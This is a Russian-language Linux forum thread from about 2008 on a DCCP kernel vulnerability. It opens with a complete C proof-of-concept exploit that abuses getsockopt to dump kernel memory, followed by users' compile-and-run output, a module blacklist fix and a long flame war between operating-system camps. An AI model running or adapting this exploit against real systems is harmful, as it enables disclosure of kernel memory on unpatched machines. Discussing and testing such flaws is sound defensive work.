Критическая уязвимость в ядре Linux

Чорт, а где эксплоит?

#include <netinet/in.h>
#include <stdio.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <net/if.h>
#include <sys/mman.h>
#include <linux/net.h>

#define BUFSIZE 0x10000000

int main(int argc, char *argv[])
{
void *mem = mmap(0, BUFSIZE, PROT_READ | PROT_WRITE,
MAP_ANONYMOUS | MAP_PRIVATE, 0, 0);
if (mem == (void*)-1) {
printf("Alloc failed\n");
return -1;
}
/* SOCK_DCCP, IPPROTO_DCCP */
int s = socket(PF_INET, 6, 33);
if (s == -1) {
fprintf(stderr, "socket failure!\n");
return 1;
}
/* SOL_DCCP, DCCP_SOCKOPT_SEND_CSCOV */
int len = BUFSIZE;
int x = getsockopt(s, 269, 11, mem, &len);

if (x == -1)
perror("SETSOCKOPT");
else
printf("SUCCESS\n");

write(1, mem, BUFSIZE);

return 0;
}

>все бы вопили какая винда дырявая и нет ей оправдания.

Несомненно, ведь там обновления один раз в месяц, а тут практически в течение дня или раньше.

>Гуглом пользуешься? Почему на ЛОР защёл? Ведь всё оно работает на Linux.

А еще котласские речники и US NAVY.

http://www.navy.mil/view_single.asp?id=59972

> Несомненно, ведь там обновления один раз в месяц, а тут практически в течение дня или раньше.

Обновление для одного известного дистрибутива вышло одновременно с объявлением бага ;)

$ lsmod | grep dccp | wc -l
0

Ну, собственно, и всё :)

> Ну, собственно, и всё :) 

Размечтался, ага.

seva@mini:~/Temp$ lsmod | grep dccp | wc -l 
0 

seva@mini:~/Temp$ ./dccp_proof
SUCCESS

seva@mini:~/Temp$ lsmod | grep dccp
dccp_ccid2              7456  0
dccp_ipv4              21512  2
dccp                   61232  2 dccp_ccid2,dccp_ipv4

andrey@evilhorse ~ $ gcc -o vot_gavno dccp_expl.c
andrey@evilhorse ~ $ ./vot_gavno
socket failure!
andrey@evilhorse ~ $ uname -a
Linux evilhorse 2.6.25-squashfs #2 Sat May 3 13:24:55 EEST 2008 i686 Intel(R) Celeron(R) CPU 2.50GHz GenuineIntel GNU/Linux
andrey@evilhorse ~ $

а теперь обьясните мне, что такое DCCP и зачем оно нужно?

ЗЫ самоконфижные ядра рулят

>А им самим этого не надо. Как и линукс.

а это плохо. это отдает красноглазым быдло-фанатизмом и бздунством. я вот более 5 лет использую решения на базе и bsd и линя. потому и могу судить что к чему. и не бросаюсь фразами "бзда ненужна". так что мсье бревнище из глаза своего и лоровских бзуднов извольте достать, а потом притензировать

главное линух не нужен, а сюда претесь. как и вантузятники. чисто из садомазохизма? или ЧСВ повышать?

> Поорать только - на это и способны.

сходи погляди, там местный бздунишка zanswer уже отметился

наверняка и тут ниже тоже. сейчас почитаем

>А, стандартная тема, все уже привыкли к дырявости ядра Linux, - это Вам не Rock Solid Solaris 10...*RSS10*

о. я был прав. тебе даунишко мало было высера на опеннете? тебе и тут надо облегчиться? этож насколько убога твоя жизнь что ты ходиш по форумам и линух ругаешь =) жаль что родители тебя не научили другим способам поднятия ЧСВ. займись лучше чем то креативным несчастный

ext@test:~$ sudo gcc -o /home/vot_gavno /home/dccc.c ext@test:~$ sudo chmod +x /home/vot_gavno ext@test:~$ /home/vot_gavno SETSOCKOPT: Protocol not available

>но я за Sun Solaris 10, ИМХО понимающие люди, да поймут...*GOD*

да мы уже давно поняли что ты малолетний идиот верящий в серебрянную пулю. ничего, пойдешь работать, узнаешь что к чему =)

>Я поражаюсь с того, какую панику народ устраивает изза исправленой уязвимости в тестовой версии ведра, касательно никому не нужного DCCP.

воюющие бздуны и вантузятники изрядно тупили и сливали в тредах за последние полугодие (солнцевские тоже ессно, но за малым их числом оно малозаметно). думается что пытаются хоть так компенсировать сие досадное для них положение

5 лет - это не срок, так себе ,категория "администратор среднего уровня подготовки", не новичок конечно, но до уровня "гуру" еще всю жизнь ползти.

>5 лет - это не срок, так себе ,категория "администратор среднего уровня подготовки", не новичок конечно, но до уровня "гуру" еще всю жизнь ползти.

Почему по себе судишь? Может ты и читать научился к 30-и годам только, а таблицу умножения до сих пор не асилил - ну, дык, не все ж такие...

>5 лет - это не срок, так себе ,категория "администратор среднего уровня подготовки", не новичок конечно, но до уровня "гуру" еще всю жизнь ползти.

несогласен, 5 лет очень даже срок для красноглазого линуксойда не вылезающего из дома, консоли и ЛОРа

угу… надо блеклистить… (и зачем я этот dccp включал?)

vvdm ~ # vim /etc/modprobe.d/blacklist
blacklist dccp
blacklist dccp_ipv4
blacklist dccp_ccid2
:wq
vvdm ~ # update-modules
vvdm ~ # ./a.out
socket failure!

Ха-ха, пишите и дальше на Си, любители трахаться с переполнениями буфера.

>Ха-ха, пишите и дальше на Си, любители трахаться с переполнением буфера

Никлаус, и ты тут!? Ахтунг парни, Вирт на форуме!!!

Все, ребятушки, поставил я WindowsXP - вот теперь я себя чувствую в безопасности. К тому же Fx3 работатет и под Windows. Так зачем мне небезопасная ОС?

> несогласен, 5 лет очень даже срок для красноглазого линуксойда не вылезающего из дома, консоли и ЛОРа

А что, за тунеядство и ассоциальное поведение опять сроки дают?

самое главное, что ты ей ни во что не упёрся :)

Чему школьник может научиться на ЛОРе? Кричать "вендакопец", "резать вдоль" и BSD RIP?.

>> несогласен, 5 лет очень даже срок для красноглазого линуксойда не вылезающего из дома, консоли и ЛОРа

>А что, за тунеядство и ассоциальное поведение опять сроки дают?

+1

Я вот только что поставил 3 сервис-пак на XP. Windus теперь не грузиться.

вот и настал виндекапец на отдельно взятом компьютере.

Пэанер, теперь выставь ее голой жьопай в нет!! =))

>>Пэанер, теперь выставь ее голой жьопай в нет!! =))

Да пожалуйста, но у нее задний прохож висит :)

о, приплюснутые прибежали. эксепшены в ядре - решают! глюки должны быть мощными и убойными.++

>Я вот только что поставил 3 сервис-пак на XP. Windus теперь не грузиться.

>вот и настал виндекапец на отдельно взятом компьютере.

не только винде, но и грамматике, и не только на компьютере =)

>о, приплюснутые прибежали. эксепшены в ядре - решают! глюки должны быть мощными и убойными.++

LOL, в плюсах разве нет проблемы с переполнением буфера? ))) Тот анонимус явно на паскаль или его подобных намекал - это очевидно, как уже и то, что ты красноглазый плюсобоф ))))))))

> Все, ребятушки, поставил я WindowsXP - вот теперь я себя чувствую в безопасности. К тому же Fx3 работатет и под Windows.

Куда теперь будещь девать ненужную oem-глисту?

> Так зачем мне небезопасная ОС?

Это тебя надо спросить, зачем ты её установил.

Ядро на Паскале, причем интерпретируемом... ВЕЩЕСТВА!

> вот если бы на винде нашли такое, все бы вопили какая винда дырявая и нет ей оправдания. а тут с точностью до наоборот.

В винде нет критических уязвимостей, там все уязвимости классические.

>По факту: Если код писал человек

даёшь огромных человекоподобных роботов, которые будут писать безошибочный код! ну и охранять границу заодно...

И принимать законы в Белом Доме.

Мла, всё тот же унылый флейм на те же доставшие всех темы. Пора двигаться дальше, друзья мои.

К *buntu уже пришел апдейт, поставил. Дружно обновляемся! %)))

http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/ тут еще не обновили (

в Debian еще нету

> Куда теперь будещь девать ненужную oem-глисту?

Висту я только у знакомых видел, ибо года два как на Ubuntu был.

Дыры есть везде. Не повод столько вонять. Это тем кто ту пишет что линух превращается в винду и т.д. Погуглите , по разным ос, везде баги, багфиксы и снова баги. Вполне нормальная ситуация.

Ухаха... свет из Ваших алых глаз меня повергает в ужас, что ещё расскажете обо мне хорошего, жду с нетерпением, жалею только о том, что Вы очередной неудачник, который неспособен не на что, кроме оскарблений, а жаль...:-D:-D:-D

Ух... Вы случаем не тот самый анонимный аналитик с интерфейсом в астрал, о котором так много говорят на ЛОР-е??=-O Жду новых открытий, о себе, из Ваших уст, это весьма забавно, наблюдать, как Вас разрывает от злости, что Вы беспомощны что-то изменить...*CRAZY*

> самоконфижные ядра рулят

именно.

>Ядро на Паскале

что вас пугает?

>причем интерпретируемом...

это тут причем?!

>ВЕЩЕСТВА!

ясно, вопросов больше не имею :)

> Висту я только у знакомых видел

Даже не удосужился её запустить прежде чем стал ставить свинью?

> ибо года два как на Ubuntu был.

Да вижу я в твоих темах как ты был на убунту. И ogg у тебя плеер не держал и папочку с примонтироваными media ты найти не мог.

ЛУЧИ ПАСКАЛЯ!111 РАСЧЕХЛЯЕМ ФРИПАСКАЛИ!! ОПТИМИЗ НА ПОЛНУЭ МОЩНОСТЬ!!!11111 ПЫЩЩЩЩЩЩЩЩЩЩЩЩЩЩЩЩЬ ПЫЩ ПЫЩ ПЫЩЩЩЩЩЩ!!!!

> Вы случаем не тот самый анонимный аналитик с интерфейсом в астрал, о котором так много говорят на ЛОР-е?

Учитывая феерический анализ в виде:

> Вас разрывает от злости > Вы беспомощны что-то изменить

Я вам запишу в диагноз нарушение самоидентификации после деанонимизации.

[gforgx@ffap ~]$ modprobe -l *dccp*

/lib/modules/2.6.24-ice/kernel/net/netfilter/xt_dccp.ko

Я так понимаю, это не то )

[gforgx@ffap ~]$ ./exploit

socket failure!

[gforgx@ffap ~]$ uname -a

Linux ffap 2.6.24-ice #1 SMP PREEMPT Mon Apr 21 21:25:06 ALMT 2008 i686 Intel(R) Pentium(R) 4 CPU 2.66GHz GenuineIntel GNU/Linux

P.S. Arch, ядро из AUR